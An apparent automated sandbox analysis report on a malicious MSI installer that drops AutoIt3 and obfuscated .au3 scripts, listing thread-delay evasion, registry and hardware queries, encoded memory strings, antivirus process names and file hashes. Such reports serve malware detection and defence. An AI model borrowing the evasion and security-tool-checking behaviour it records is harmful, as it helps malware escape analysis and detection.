Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Window / User API: threadDelayed 521	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Window / User API: foregroundWindowGot 827	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Window / User API: foregroundWindowGot 832	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 42141	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 119333	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 38013	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 47979	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 58022	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 33161	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 44923	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 40647	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 117784	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 53266	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 100936	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 47690	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 98379	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 74299	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 98773	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 35309	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 34527	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 78150	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 70488	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 66239	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 73944	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 68690	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 34428	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 87931	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 90734	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 98794	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 90071	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 92014	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 70098	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 118782	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 68075	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 98860	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 101240	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 52037	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 32379	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 76502	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 118775	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\fkeabad\Autoit3.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: Autoit3.exe, 0000000D.00000002.596679945.0000000001A16000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUp%j
Source: cmd.exe, 0000000E.00000002.706196791.0000000003337000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: Autoit3.exe	Binary or memory string: +sIGhDJxZUVM1sqLmrzSLYo/XwaPj9IFkgc81cqEMU36wgaEPHFlRUzWyouKsi2KP18Gg7+P0gcSBbzVytQxTfrCBtQ+cWVFTNbK27qyP1o/XwaDv4/SBZIHPNXKhDFN+sIGhDhxZUVM1sqKmrzSLYo/XwaP4gR/ggc81cqEMU36wgaEOnFlRUzWyov6sg7qMi6KMg7qci6Kfw9mmjqyBr/iBH+CBzzVyoQxTfrCBoQ0sXVFQg7qMi6KPNbKivq/D2aa
Source: Autoit3.exe	Binary or memory string: FdArCCoQwqrq6sgqEM9TlRUL2vfRSCoQ3RfVFTw9mj+IEf6+CBzJv5XIO6jIOtXEq+rq6tDeUNUVCD+V6QEeCDuoyDrV0Pyr6ur8PL2aDv+IEf4IPajKGhXQJAgqEMuQ1RUr1WHqNisIKhDl6urqyCoEaqrq6tDg6+rq0CsIKhDaKqrqyCoQ7dOVFQva99FIKhDzl9UVCCoQ6FOVFQva98RIKhD+F9UVPD2aP4gRyhvU5h5Iv5TIu5XmGv+w/AU6qvPV
Source: Autoit3.exe	Binary or memory string: r/iBH+CBzzVyoQxTfrCBoQxcXVFQg7qMi6KMg7qci6KfNbKiuq/D2aaOrIGv+IEf4IHPNXKhDFN+sIGhDOxdUVCDuoyLooyDupyLop81sqK2r8PZpo6sga/4gR/ggc81cqEMU36wgaEPPF1RUIO6jIuijIO6nIuinzWyorKvw9mmjqyBr+P0gcSBbzVytQxTfrCBtQ5MXVFTNbK2gqytQql6wa80i7aP18Ggga/tDMRdUVPPNbKuuq3bzozBoJuur+0M
Source: Autoit3.exe	Binary or memory string: F1RU881sq6yrdvOjMGgm66v7Q9kXVFTzzWyrrat006MwaCbrq/j9IFkgc81cqEMU36wgaEN/EFRUmGsi6KPNbKirqibooyB9Q09XVVT18Gg7+P0gWSBzzVyoQxTfrCBoQwMQVFSYayLoo81sqKOrJuij+xJUVFTUEaqrq6sgbUOCrVRU9fBoIGv4/SBZIHPNXKhDFN+sIGhD2xBUVJhrIuijzWyopqsm6KMgfUOrslRU9fBoO/j9IFkgc81cqEMU36wg
Source: Autoit3.exe	Binary or memory string: SBtQ3awVFQgYxGv7eqrIK+PQ1laVVQva96nzSCozRGiq0NhHVRU8fXwaKurq6+pq6urq6trq6urq6ur7fj9/CByIFkgU81crEMU36wgbEOuFVRUK5bHyO2rq9+7pBVozSCv7ivI7avNIqxArs1srKirItyj9PXwaPj9IFkgc81cqEMU36wgaENnFlRUzWyoqKsi2KP18Gg7+P0gcSBbzVytQxTfrCBtQwcWVFTNbK26qyP1o/XwaDv4/SBZIHPNXKhDF
Source: Autoit3.exe	Binary or memory string: MVFRDe1JUVPT18CBO9mg7QwSrq6toIGv4/fz6IFkgc81cqEMU36wgaEN1V1RUzSCVzShUv9il/fhD6UxUVEM+UlRUQNLNKlSrqt68zWyoq6qYayLooybooyD9o0NkllRUQPDNKlSqqt64zSKQIO2jIuijIGhUvo+j7KtA6s1cbKuL37sSn6zqqyB9IGhDNVZUVECBIH8gbEOI7KurL2vfusGrIGUgeCDvj68gs1T4g0Cn/fhDbE1UVEOxUlRU8fT18Gg
Source: Autoit3.exe	Binary or memory string: +P0gcSBbkFjfnc1cqEMU3o3NXK1DFN+sIG1DgldUVCCoIq0g6K8i7a8g6KMi7aMg6Kci7adAoiB4IG1Dv1RUVPXwaDv+IEcob1v4/fwgUiBZIHMm7lv7Q/tNVFSYa/7DI6Pqq89Um88iiyB9Ju5bQydUVFQm7ltUvouj7KukHGQm/lsgaEPpqaurmGvx8vLPIrvDJKPqqybuW0OOV1RUaEJEnlRUQFv09fAgTvZoIGv+IEfBq/ggc5hr/sN9o+qrz1Sb
Source: Autoit3.exe, 00000008.00000002.565947520.0000000001213000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614013393.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00450514 mov eax, dword ptr fs:[00000030h]		9_2_00450514
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00458B34 mov eax, dword ptr fs:[00000030h]		9_2_00458B34

Source: Autoit3.exe, 00000008.00000003.562124824.0000000004685000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004474000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.565469736.0000000000A36000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: cmd.exe, 00000009.00000002.614013393.00000000033C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerabad\V
Source: SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager8.6
Source: SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.763757164.0000000000732000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerST
Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.617261525.00000000063BE000.00000004.00000010.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820550875.000000000972E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: cmd.exe, 00000009.00000002.614013393.00000000033E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerkeabad
Source: SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerabad\
Source: Autoit3.exe, 00000008.00000002.566996482.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.568412536.0000000004958000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.566222341.0000000001337000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: cmd.exe, 00000009.00000002.617175946.000000000627E000.00000004.00000010.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.617463634.000000000693E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Managerifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com
Source: cmd.exe, 00000009.00000002.614013393.00000000033E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerVGg
Source: SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.763757164.0000000000732000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerkeabad;
Source: SciTE.exe, 00000018.00000002.820550875.000000000972E000.00000004.00000010.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820725792.0000000009CAE000.00000004.00000010.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820504444.00000000095EE000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: tProgram Manager
Source: cmd.exe, 00000009.00000002.614013393.00000000033C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerVG
Source: cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: program manager
Source: cmd.exe, 00000009.00000003.580764198.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614013393.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.582186478.00000000033E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerisoft
Source: cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: program manager<

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\fkeabad\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\fkeabad\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\fkeabad\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Windows Analysis Report 15e7232gfN.msi

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
15e7232gfN.msi

Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\ProgramData\fkeabad\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\ProgramData\fkeabad\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior

Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: superantispyware.exe

ID:	1280109
Product:	CloudBasic
Start time:	13:59:55
Start date:	26.07.2023
Sample:	15e7232gfN.msi
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	247a8cc39384e93d258360a11381000f
SHA1:	23893f035f8564dfea5030b9fdd54120d96072bb
SHA256:	6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\fkeabad\Autoit3.exe	PE32 executable (GUI) Intel 80386, for MS Windows	C56B5F0201A3B3DE53E561FE76912BFD	2A4062E10A5DE813F5688221DBEB3F3FF33EB417	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
C:\ProgramData\fkeabad\efghhgd.au3	ASCII text, with very long lines (65536), with no line terminators	ED1131E98DAD331D3FEB1C38B2C6BA51	BB3F4522D7D0D3F4D5B9917019242AE5496F6F16	B68861CDFC100021261A1F3067324628A31E85BA7EE3857FBD496D4AEFB2E68D
C:\ProgramData\fkeabad\kadfedf\afhbfhd	data	EFE32663E95C34B9E5DFD8EA4CE9E337	C4AFC04189F77CB661A3ADBFCB7B77989CBB0AFE	8B5BFA938B0DEA6D29384BE513A887FA4EC94FD08CF68520E3C51E4B17A7CB31
C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files.cab	Microsoft Cabinet archive data, many, 1669773 bytes, 2 files, at 0x2c +A "Autoit3.exe" +A "UGtZgHHT.au3", ID 56955, number 1, 51 datablocks, 0 compression	E7C3B16ED93B760546AE6756B12644DA	99B3B1AF70B45B4B815A814F61F9B6E509CD3BB6	659733A584C52078AC6B568DFB34A089BEF2B3835A5EA737D32C1623A468B743
